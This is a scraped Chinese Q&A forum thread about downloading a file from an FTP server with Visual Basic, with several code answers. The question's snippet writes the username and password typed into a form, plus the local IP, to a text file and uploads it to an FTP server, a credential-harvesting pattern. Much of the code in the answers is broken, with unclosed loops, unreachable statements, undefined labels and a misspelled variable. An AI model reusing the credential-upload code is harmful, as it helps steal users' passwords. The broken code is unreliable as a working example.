解决时间 2021-05-04 10:42
- 提问者网友:我是我
- 2021-05-04 02:18
例如我想把 ftp://xxx.xxx.xxx/x.exe中的X.exe用VB下载到本机!
Private Sub Command1_Click()
Open "C:\1.txt" For Append As #1
Print #1, "用户名:"; Text1.Text, "密码:"; Text2.Text, "来自于:"; Winsock1.LocalIP, ""
Close #1
End Sub
Inet1.URL = "" ' ftp地址
Inet1.Protocol = 2
Inet1.UserName = "" '用户名
Inet1.Password = "" ' 密码
Inet1.Execute , "PUT " & "c:\1.txt" & " 1.txt"
Do While Inet1.StillExecuting
MsgBox "OK啦!", vbInformation, "提示"
End Sub
- 五星知识达人网友:duile
- 2021-05-04 02:54
Option Explicit
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Info() As String, TimerCountA As Long
Private WithEvents wscControl As MSWinsockLib.Winsock
Private WithEvents wscData As MSWinsockLib.Winsock
Private Tmp As String, FileSize As String, DFile As String
Private Sub TimerControl_Timer()
LabelControl.Caption = "控制连接状态:" & WinSState(wscControl.State)
End Sub
Private Sub TimerData_Timer()
LabelData.Caption = "数据连接状态:" & WinSState(wscData.State)
End Sub
Private Sub wscControl_DataArrival(ByVal bytesTotal As Long)
Dim i As String
wscControl.GetData Tmp
End Sub
Private Sub wscData_DataArrival(ByVal bytesTotal As Long)
Dim ByteData() As Byte
wscData.GetData ByteData(), vbByte
Open DFile For Binary Lock Write As #1
ProgressBar.Value = FileLen(DFile)
If LOF(1) > 0 Then
Seek #1, LOF(1) + 1
End If
Put #1, , ByteData()
Close #1
End Sub
Private Sub wscData_Close()
End Sub
Function ChkTime()
Dim i As Integer
i = 50
Do While i > 0
If Tmp <> "" Then Exit Function
Sleep (100)
i = i - 1
ChkTime = True
End Function
Function ConnFtp(HostIp, HostPort, User, Pass)
If wscControl Is Nothing Then
Set wscControl = Controls.Add("MSWinsock.Winsock", "wscControl", Me)
TimerControl.Interval = 100
TimerControl.Enabled = True
End If
With wscControl
.RemoteHost = HostIp
.RemotePort = HostPort
End With
If ChkTime Then
ConnFtp = "连接超时,是否重试?"
Exit Function
End If
Debug.Print Tmp
Select Case Left(Tmp, 3)
Case "220"
Tmp = ""
wscControl.SendData "USER " & User & vbCrLf
Debug.Print "USER " & User & vbCrLf
If ChkTime Then
ConnFtp = "连接错误USER,是否重试?" & vbCrLf & Tmp
Exit Function
End If
Debug.Print Tmp
Select Case Left(Tmp, 3)
Case "331"
Tmp = ""
wscControl.SendData "PASS " & Pass & vbCrLf
Debug.Print "PASS " & Pass & vbCrLf
If ChkTime Then
ConnFtp = "连接错误PASS,是否重试?" & vbCrLf & Tmp
Exit Function
End If
Debug.Print Tmp
Select Case Left(Tmp, 3)
Case "230"
If InStr(Tmp, "230 ") > 0 Then
ConnFtp = "OK"
Tmp = ""
Exit Function
End If
Tmp = ""
GoTo PassCS
Case "530"
ConnFtp = "登陆失败,用户名或密码错误,是否重试?" & vbCrLf & Tmp
Tmp = ""
Exit Function
End Select
End Select
End Select
ConnFtp = "错误"
End Function
Function DownFile(File As String, TransferMode As String)
Dim FileHaveLen As String
If wscControl.State <> 7 Then
MsgBox "请确认当前连接状态!1"
Exit Function
End If
wscControl.SendData "NOOP " & vbCrLf
Debug.Print "NOOP " & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 200 Then
Debug.Print Tmp
DownFile = "请确认当前连接状态!2" & vbCrLf & Tmp
Tmp = ""
Exit Function
Debug.Print Tmp
Tmp = ""
End If
If TransferMode = "I" Or TransferMode = "A" Then
wscControl.SendData "TYPE " & TransferMode & vbCrLf
Debug.Print "TYPE " & TransferMode & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 200 Then
Debug.Print Tmp
DownFile = "改变状态失败!" & vbCrLf & Tmp
Tmp = ""
Exit Function
Debug.Print Tmp
Tmp = ""
End If
End If
File = Replace(File, "\", "/")
Dim PathT As String
PathT = Left(File, InStrRev(File, "/"))
If PathT <> "" Then
wscControl.SendData "CWD " & PathT & vbCrLf
Debug.Print "CWD " & PathT & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 250 Then
Debug.Print Tmp
DownFile = "改变目录失败!" & vbCrLf & Tmp
Tmp = ""
Exit Function
Debug.Print Tmp
Tmp = ""
End If
End If
Dim FileT As String
FileT = Right(File, Len(File) - InStrRev(File, "/"))
wscControl.SendData "SIZE " & FileT & vbCrLf
Debug.Print "SIZE " & FileT & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 213 Then
Debug.Print Tmp
DownFile = "取得文件大小失败!" & vbCrLf & Tmp
Tmp = ""
Exit Function
Debug.Print Tmp
FileSize = Right(Tmp, Len(Tmp) - 4)
ProgressBar.Max = FileSize
Print "文件大小:" + CStr(FormatNumber(FileSize / 1024, 2)) + "KB..."
Tmp = ""
End If
wscControl.SendData "PASV" & vbCrLf
Debug.Print "PASV" & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 227 Then
Debug.Print Tmp
DownFile = "获取Pasv端口失败!" & vbCrLf & Tmp
Tmp = ""
Exit Function
Debug.Print Tmp
Dim Tmp1, Tmp2, Tmp3, Tmp4, TmpIp, TmpPort
Tmp1 = InStr(Tmp, Chr(40)) + 1
Tmp2 = InStrRev(Tmp, Chr(41))
Tmp3 = Mid(Tmp, Tmp1, Tmp2 - Tmp1)
Tmp4 = Split(Tmp3, ",")
TmpIp = Tmp4(0) & "." & Tmp4(1) & "." & Tmp4(2) & "." & Tmp4(3)
TmpPort = Tmp4(4) * 256 + Tmp4(5)
Tmp = ""
End If
Open DFile For Binary Lock Write As #1
If LOF(1) > 0 Then
FileHaveLen = FileLen(DFile)
Close #1
If MsgBox("文件已存在,是否续传?", vbYesNo, "提示:") <> vbYes Then
Kill DFile
wscControl.SendData "REST " & FileHaveLen & vbCrLf
Debug.Print "REST " & FileHaveLen & vbCrLf
If ChkTime Or Left(Tmp, 3) <> 350 Then
MsgBox "服务器不支持续传,将重新下载文件!" & vbCrLf & Tmp
Kill DFile
End If
Debug.Print Tmp
Tmp = ""
End If
Close #1
End If
If wscData Is Nothing Then
Set wscData = Controls.Add("MSWinsock.Winsock", "wscData", Me)
TimerData.Interval = 100
TimerData.Enabled = True
End If
With wscData
.RemoteHost = TmpIp
.RemotePort = TmpPort
End With
wscControl.SendData "RETR " & FileT & vbCrLf
Debug.Print "RETR " & FileT & vbCrLf
If ChkTime Then
DownFile = "连接数据超时!"
Exit Function
End If
Debug.Print Tmp
If InStr(Tmp, "226 ") > 0 Then GoTo End1
Tmp = ""
Do While wscData.State = 7
If ChkTime Then
DownFile = "下载失败!"
Exit Function
End If
Debug.Print Tmp
Tmp = ""
DownFile = "OK"
End Function
Private Sub Command2_Click()
Dim n
DFile = "C:\Documents and Settings\Administrator\桌面\a.rar"
n = ConnFtp("", "21", "temp", "tmp")
If n <> "OK" Then
If MsgBox(n, vbYesNo, "提示:") = vbYes Then GoTo a1
Exit Sub
End If
n = DownFile("system\a.rar", "I")
If n <> "OK" Then
MsgBox n, , "提示:"
Exit Sub
End If
MsgBox "下载成功!"
End Sub
- 1楼网友:忘川信使
- 2021-05-04 03:59
Private Sub Command1_Click()
lnginet = InternetOpen(vbNullString, INTERNET_OPEN_TYPE_PRECONFIG, _
vbNullString, vbNullString, 0&)
If lnginet Then
lnginetconn = InternetConnect(lnginet, "FTP地址", 0, _
"用户名", "密码", 1, 0, 0)
If lnginetconn Then
' blnRC = FtpGetFile(lnginetconn, "qq/使用必读.txt", "c:\使用必读.txt", 0, 0, 1, 0)
blnRC = FtpPutFile(inginetconn, "c:\使用必读.txt", "使用必读.txt", 1, 0)
If blnRC Then
MsgBox "download ok!!!"
End If
InternetCloseHandle lnginetconn
InternetCloseHandle lnginet
MsgBox "close ok!!!"
MsgBox "can't connect"
End If
MsgBox "ftp wrong"
End If
End Sub